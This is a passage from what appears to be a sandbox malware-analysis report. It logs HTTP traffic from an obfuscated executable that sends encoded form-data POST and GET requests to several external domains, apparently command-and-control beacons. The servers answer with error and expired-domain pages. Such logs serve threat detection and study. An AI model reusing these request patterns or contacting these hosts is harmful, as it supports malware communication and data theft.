                                  May 23, 2024 15:19:22.710387945 CEST1236INData Raw: 65 73 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 4c 69 67 68 74 47 6f 6c 64 65 6e 52 6f 64 59 65 6c 6c 6f 77 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 32 70 78 20 53 6c 61 74
                                  Data Ascii: es { background-color: LightGoldenRodYellow; border-bottom: solid 2px SlateGrey; } #route_table tbody.exact_matches tr, #route_table tbody.fuzzy_matches tr { background: none; border-bottom: none; } #route_table td
                                  May 23, 2024 15:19:22.710396051 CEST224INData Raw: 54 72 61 63 65 26 23 33 39 3b 29 3b 73 68 6f 77 28 26 23 33 39 3b 41 70 70 6c 69 63 61 74 69 6f 6e 2d 54 72 61 63 65 26 23 33 39 3b 29 3b 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 41 70 70 6c 69 63 61 74 69 6f 6e 20 54 72 61 63 65 3c 2f
                                  Data Ascii: Trace&#39;);show(&#39;Application-Trace&#39;);; return false;">Application Trace</a> | <a href="#" onclick="hide(&#39;Application-Trace&#39;);hide(&#39;Full-Trace&#39;);show(&#39;Framework-Trace&#39;);; return false;">Fr
                                  May 23, 2024 15:19:22.711849928 CEST1236INData Raw: 61 6d 65 77 6f 72 6b 20 54 72 61 63 65 3c 2f 61 3e 20 7c 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 20 6f 6e 63 6c 69 63 6b 3d 22 68 69 64 65 28 26 23 33 39 3b 41 70 70 6c 69 63 61 74 69 6f 6e 2d 54 72 61 63 65 26 23 33 39 3b 29 3b 68 69 64
                                  Data Ascii: amework Trace</a> | <a href="#" onclick="hide(&#39;Application-Trace&#39;);hide(&#39;Framework-Trace&#39;);show(&#39;Full-Trace&#39;);; return false;">Full Trace</a> <div id="Application-Trace" style="display: block;"> <pre><co
                                  May 23, 2024 15:19:22.711857080 CEST1236INData Raw: 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 76 65 5f 73 75 70 70 6f 72 74 2f 74 61 67 67 65 64 5f 6c 6f 67 67 69 6e 67 2e 72 62 3a 37 31 3a 69 6e 20 60 74 61 67 67 65 64 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74
                                  Data Ascii: (5.2.6) lib/active_support/tagged_logging.rb:71:in `tagged&#39;</a><br><a class="trace-frames" data-frame-id="7" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `call&#39;</a><br><a class="trace-frames" data-frame-id="8" href="#">acti
                                  May 23, 2024 15:19:22.715688944 CEST1236INData Raw: 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 36 22 20 68 72 65 66 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29
                                  Data Ascii: `call&#39;</a><br><a class="trace-frames" data-frame-id="16" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#39;</a><br><a class="trace-frames" data-frame-id="17" href="#">railties (5.2.6) lib/rails/user.rb:524:in `call&#39;</a><br>
                                  May 23, 2024 15:19:22.715703011 CEST1236INData Raw: 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 32 22 20 68 72 65 66 3d 22 23 22 3e 6c 6f 67 72 61 67 65 20 28 30 2e 31 31 2e 32 29 20 6c 69 62 2f 6c 6f 67 72 61 67 65 2f 72 61 69 6c 73 5f 65 78 74 2f 72 61 63
                                  Data Ascii: race-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `block in call&#39;</a
                                  May 23, 2024 15:19:22.717035055 CEST1236INData Raw: 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 6d 65 74 68 6f 64 5f 6f 76 65 72 72 69 64 65 2e 72 62 3a 32 34 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72
                                  Data Ascii: ="#">rack (2.2.3) lib/rack/method_override.rb:24:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="13" href="#">activesuppor
                                  May 23, 2024 15:19:22.717041969 CEST1236INData Raw: 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 73 65 72 76 65 72 2e 72 62 3a 33 32 38 3a 69 6e 20 60 62 6c 6f 63 6b 20 69 6e 20 72 75 6e 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22
                                  Data Ascii: ef="#">puma (4.3.9) lib/puma/server.rb:328:in `block in run&#39;</a><br><a class="trace-frames" data-frame-id="22" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread&#39;</a><br></code></pre> </div> <script type


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  7192.168.2.649713216.40.34.41803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:19:24.696022987 CEST1779OUTPOST /qukz/ HTTP/1.1
                                  Host: www.botcsllc.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.botcsllc.com
                                  Referer: http://www.botcsllc.com/qukz/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 37 68 55 61 76 4a 45 52 32 76 57 2b 72 42 41 76 53 79 72 51 52 77 53 57 4a 72 6f 75 30 54 77 4e 38 71 51 4b 37 79 5a 51 30 64 68 77 5a 38 78 77 63 61 61 4a 39 45 73 34 4f 41 2b 78 57 50 57 4d 41 32 66 44 4f 4b 56 35 7a 6b 58 6f 67 4b 4e 6e 73 48 69 6a 78 4a 6d 49 47 52 50 41 62 38 32 4c 32 33 75 38 53 43 75 6a 6e 48 48 33 70 4d 54 79 6e 7a 62 30 56 6e 7a 66 76 36 2b 58 6f 39 44 56 4c 32 53 70 38 51 75 4a 50 42 67 6e 30 54 79 7a 64 72 51 44 46 4a 48 65 62 4d 36 6d 42 5a 6a 43 75 34 51 31 4d 67 6d 6d 6a 51 2f 67 4f 36 72 36 56 48 51 4f 4f 42 57 37 4c 6e 66 62 57 6c 75 48 61 46 5a 31 79 4b 33 77 62 65 32 6e 58 36 4f 53 79 66 4c 74 46 63 56 43 65 72 68 6e 51 39 6c 59 6f 4e 48 68 44 78 7a 33 79 2f 48 6c 69 52 34 4d 77 48 54 37 52 65 6c 68 44 76 71 38 62 62 34 74 2b 6d 52 38 37 32 46 54 4d 56 31 70 58 5a 32 64 7a 71 38 65 32 39 6a 75 7a 4f 66 61 4f 71 63 78 39 46 79 66 66 47 7a 66 58 43 79 36 6b 6e 62 46 5a 6b 56 38 6b 31 58 55 52 38 68 62 44 56 45 79 61 34 62 73 33 43 32 64 76 31 39 4e 65 [TRUNCATED]
                                  Data Ascii: FNPd=7hUavJER2vW+rBAvSyrQRwSWJrou0TwN8qQK7yZQ0dhwZ8xwcaaJ9Es4OA+xWPWMA2fDOKV5zkXogKNnsHijxJmIGRPAb82L23u8SCujnHH3pMTynzb0Vnzfv6+Xo9DVL2Sp8QuJPBgn0TyzdrQDFJHebM6mBZjCu4Q1MgmmjQ/gO6r6VHQOOBW7LnfbWluHaFZ1yK3wbe2nX6OSyfLtFcVCerhnQ9lYoNHhDxz3y/HliR4MwHT7RelhDvq8bb4t+mR872FTMV1pXZ2dzq8e29juzOfaOqcx9FyffGzfXCy6knbFZkV8k1XUR8hbDVEya4bs3C2dv19NeDO6ZwdQkn7FG469j5TuF6Y1rXARXfK6DMPU/PAjZXr4MfXg2MbDiajAkFjytzOeUg8Jf/uyLVgPG98ArebHzeiUjBIDQK0y+bkt/L0L0D0jxvwnnV1TlLkHEwAsSpk5l42NueQHrbQbSNL4nDqsYTIQOSBFH7daR7YJsQfOtiyA0Jw7huce7cv3l8qG0WK6enRCRuPfG1gGBhMv516CrueBYPvIW0hGcPMnTZ+zxoYtBvO4bn101BrjBXBL/ZQxO7glBHuE85BixD2W1WkfcnBI6vJQvsR495LZmlivc+sUplKNPG0VSwRVfGGLkQn1tZT6SqUntA4vHAOFmDFlFoEVmog5+e0geWOYrB/A6ssTRXlBY9AWOf4DoC6uhfPjA1RCPczhJp+MzE8VfKIdwEG4u/0qD9yq0PHfWg/UsTr5dRsPkU0vyJteoxyowmv3ro0qlYxEicnhbVYS0hUMyS08eC+fxztmfr024544dgGrj73ZgKBdpzkrki6pSpaAF9rAhrLQKKRReOp98UtyS6zC3fJp9SZHW8pGpoXcSjGbwmEPgVUvSga1AzMsEzGZH32w05j6Lt2eym6pa1k+35e4STKWNRnZ/flbwW9q0Fu8ayXMLiNhWrkO+aB2NmutLsyhMicTz9Bq6Euosfe8DRXVZjGn/dDmlzZ [TRUNCATED]
                                  May 23, 2024 15:19:25.218638897 CEST1236INHTTP/1.1 404 Not Found
                                  content-type: text/html; charset=UTF-8
                                  x-request-id: 4b985045-4e35-4cf0-bbf2-5ba0b279109b
                                  x-runtime: 0.023026
                                  content-length: 19281
                                  connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                  May 23, 2024 15:19:25.220802069 CEST1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                  Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                  May 23, 2024 15:19:25.225644112 CEST1236INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                  Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                  May 23, 2024 15:19:25.225657940 CEST1236INData Raw: 0a 20 20 20 20 76 61 72 20 74 6f 67 67 6c 65 53 65 73 73 69 6f 6e 44 75 6d 70 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 73 65 73 73 69 6f 6e 5f 64 75 6d 70 27 29 3b 0a 20 20 20
                                  Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                  May 23, 2024 15:19:25.235279083 CEST1236INData Raw: 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74 69 6f 6e 73 2e 72 62 3a 33 33 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65
                                  Data Ascii: ion_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" h
                                  May 23, 2024 15:19:25.240149021 CEST1236INData Raw: 5f 69 64 2e 72 62 3a 32 37 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 31 22 20 68 72 65 66 3d 22 23 22
                                  Data Ascii: _id.rb:27:in `call&#39;</a><br><a class="trace-frames" data-frame-id="11" href="#">rack (2.2.3) lib/rack/method_override.rb:24:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `cal
                                  May 23, 2024 15:19:25.240164042 CEST1236INData Raw: 32 3a 69 6e 20 60 70 72 6f 63 65 73 73 5f 63 6c 69 65 6e 74 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 32 31 22 20 68 72 65 66 3d 22
                                  Data Ascii: 2:in `process_client&#39;</a><br><a class="trace-frames" data-frame-id="21" href="#">puma (4.3.9) lib/puma/server.rb:328:in `block in run&#39;</a><br><a class="trace-frames" data-frame-id="22" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:
                                  May 23, 2024 15:19:25.249802113 CEST1236INData Raw: 69 64 3d 22 36 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 76 65 73 75 70 70 6f 72 74 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 76 65 5f 73 75 70 70 6f 72 74 2f 74 61 67 67 65 64 5f 6c 6f 67 67 69 6e 67 2e 72 62 3a 37 31 3a 69 6e 20 60
                                  Data Ascii: id="6" href="#">activesupport (5.2.6) lib/active_support/tagged_logging.rb:71:in `tagged&#39;</a><br><a class="trace-frames" data-frame-id="7" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `call&#39;</a><br><a class="trace-frames" d
                                  May 23, 2024 15:19:25.249818087 CEST1236INData Raw: 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 74 61 74 69 63 2e 72 62 3a 31 32 37 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65
                                  Data Ascii: h/middleware/static.rb:127:in `call&#39;</a><br><a class="trace-frames" data-frame-id="16" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#39;</a><br><a class="trace-frames" data-frame-id="17" href="#">railties (5.2.6) lib/rails/engin
                                  May 23, 2024 15:19:25.255414963 CEST1236INData Raw: 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 74 61 72 67 65 74 20 3d 20 65 2e 74 61 72 67 65 74 3b 0a 20 20 20 20 20 20 20 20 76 61
                                  Data Ascii: unction(e) { e.preventDefault(); var target = e.target; var frame_id = target.dataset.frameId; if (selectedFrame) { selectedFrame.className = selectedFrame.className.replace("selected", ""); }
                                  May 23, 2024 15:19:25.255428076 CEST672INData Raw: 20 61 62 73 6f 6c 75 74 65 20 55 52 4c 20 28 77 69 74 68 20 74 68 65 20 68 74 74 70 20 61 6e 64 20 64 6f 6d 61 69 6e 29 22 20 68 72 65 66 3d 22 23 22 3e 55 72 6c 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 2f 74 68 3e 0a 20 20 20 20 20 20 3c 74 68 3e 0a
                                  Data Ascii: absolute URL (with the http and domain)" href="#">Url</a> </th> <th> </th> <th> <input id="search" placeholder="Path Match" type="search" name="path[]" /> </th> <th> </th> </tr> </thead>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  8192.168.2.649714216.40.34.41803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:19:27.226608992 CEST491OUTGET /qukz/?FNPd=2j86s8NJ5fDu8DdyaluKTyyQGpxO5RQn4ZQP4QlLq4dDbMhIcvPH81QwZFWQYfauPSKzeNxy1T+ygqRogiCCubiSHCzeY+ai+VGnS0fEikTej8/T0yfRDQzRtbWcxq7BJieL0EY=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1
                                  Host: www.botcsllc.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:19:27.726614952 CEST1236INHTTP/1.1 200 OK
                                  x-frame-options: SAMEORIGIN
                                  x-xss-protection: 1; mode=block
                                  x-content-type-options: nosniff
                                  x-download-options: noopen
                                  x-permitted-cross-domain-policies: none
                                  referrer-policy: strict-origin-when-cross-origin
                                  content-type: text/html; charset=utf-8
                                  etag: W/"716ddccefe706082230daa01e9261cc7"
                                  cache-control: max-age=0, private, must-revalidate
                                  x-request-id: fb0c1d02-9dd2-463c-b18c-b447328df50d
                                  x-runtime: 0.004365
                                  transfer-encoding: chunked
                                  connection: close
                                  Data Raw: 31 34 42 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 33 43 62 61 56 76 77 2d 49 37 4d 6c 72 6d 6d 6d 48 7a 30 62 66 62 6b 6f 37 6f 4d 43 57 31 6d 6e 32 75 36 35 75 57 73 57 57 42 38 27 20 6e 61 6d 65 3d 27 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 64 61 74 61 [TRUNCATED]
                                  Data Ascii: 14B1<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>botcsllc.com is expired</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?source=expired">
                                  May 23, 2024 15:19:27.728070974 CEST1236INData Raw: 3c 69 6d 67 20 77 69 64 74 68 3d 22 31 30 32 22 20 68 65 69 67 68 74 3d 22 33 30 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 68 76 5f 6c 6f 67 6f 5f 72 65 74 69 6e 61 2d 36 61 32 62 61 38 33 35 30 39 30 37 64 34 61 31 37 62 66 63 37 38 36 33 63
                                  Data Ascii: <img width="102" height="30" src="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>botcsllc.com</h1><h2>has expired.</h2><div class='cta'><a class='btn' href='https://w
                                  May 23, 2024 15:19:27.731059074 CEST1236INData Raw: 65 78 70 69 72 65 64 22 3e 44 6f 6d 61 69 6e 20 50 72 69 63 69 6e 67 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 76 65 72 2e 63 6f 6d
                                  Data Ascii: expired">Domain Pricing</a></li><li><a rel="nofollow" href="https://www.hover.com/email?source=expired">Email</a></li><li><a rel="nofollow" href="https://www.hover.com/about?source=expired">About Us</a></li><li><a rel="nofollow" href="https
                                  May 23, 2024 15:19:27.734087944 CEST1236INData Raw: 2d 31 39 2e 34 36 36 37 35 20 2d 36 2e 37 39 39 33 34 2c 34 2e 30 33 32 39 35 20 2d 31 34 2e 33 32 39 33 2c 36 2e 39 36 30 35 35 20 2d 32 32 2e 33 34 34 36 31 2c 38 2e 35 33 38 34 31 20 2d 36 2e 34 31 37 37 35 2c 2d 36 2e 38 33 38 37 39 20 2d 31
                                  Data Ascii: -19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47
                                  May 23, 2024 15:19:27.737076044 CEST1236INData Raw: 2d 37 35 20 31 38 31 74 2d 31 38 31 20 37 35 74 2d 31 38 31 20 2d 37 35 74 2d 37 35 20 2d 31 38 31 74 37 35 20 2d 31 38 31 74 31 38 31 20 2d 37 35 74 31 38 31 20 37 35 74 37 35 20 31 38 31 7a 4d 31 31 36 32 20 36 34 30 71 30 20 2d 31 36 34 20 2d
                                  Data Ascii: -75 181t-181 75t-181 -75t-75 -181t75 -181t181 -75t181 75t75 181zM1162 640q0 -164 -115 -279t-279 -115t-279 115t-115 279t115 279t279 115t279 -115t115 -279zM1270 1050q0 -38 -27 -65t-65 -27t-65 27t-27 65t27 65t65 27t65 -27t27 -65zM768 1270 q-7 0 -
                                  May 23, 2024 15:19:27.737088919 CEST437INData Raw: 65 72 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 28 66 75 6e 63 74 69 6f 6e 28 69 2c 73 2c 6f 2c 67 2c 72 2c 61 2c 6d 29 7b 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 27 5d 3d 72 3b 69 5b 72 5d 3d 69 5b 72 5d 7c 7c 66 75
                                  Data Ascii: er><script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insert


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  9192.168.2.6497153.33.130.190803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:19:32.772777081 CEST769OUTPOST /q801/ HTTP/1.1
                                  Host: www.darkerberrycoffee.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.darkerberrycoffee.com
                                  Referer: http://www.darkerberrycoffee.com/q801/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 70 31 57 69 38 7a 7a 30 37 31 4f 4c 52 39 32 38 6f 5a 78 66 49 78 70 68 4c 50 76 61 4c 6c 76 6b 52 38 47 33 4d 41 30 6a 46 50 4a 45 75 64 4c 75 53 57 4e 53 45 49 61 53 6f 33 71 38 30 44 45 4e 7a 49 52 55 46 79 6c 76 79 4a 51 52 42 44 69 42 62 45 71 31 4d 65 7a 76 43 4d 7a 52 46 72 58 4b 74 4b 59 6b 4a 6e 45 6f 76 6b 6d 65 52 76 4a 4d 69 69 66 55 63 62 4e 66 32 59 4d 48 66 69 52 45 55 67 5a 38 67 50 63 42 4e 6a 2b 45 6c 2b 64 35 38 70 62 63 31 44 4c 70 55 78 34 77 6f 65 44 30 67 2b 2f 54 41 68 37 65 35 6f 35 35 4b 43 64 7a 79 45 64 54 75 59 41 68 48 75 42 32 6c 76 55 4f 68 4a 7a 58 64 51 6c 41 4b 47 75 51
                                  Data Ascii: FNPd=p1Wi8zz071OLR928oZxfIxphLPvaLlvkR8G3MA0jFPJEudLuSWNSEIaSo3q80DENzIRUFylvyJQRBDiBbEq1MezvCMzRFrXKtKYkJnEovkmeRvJMiifUcbNf2YMHfiREUgZ8gPcBNj+El+d58pbc1DLpUx4woeD0g+/TAh7e5o55KCdzyEdTuYAhHuB2lvUOhJzXdQlAKGuQ


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  10192.168.2.6497163.33.130.190803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:19:35.307781935 CEST793OUTPOST /q801/ HTTP/1.1
                                  Host: www.darkerberrycoffee.com
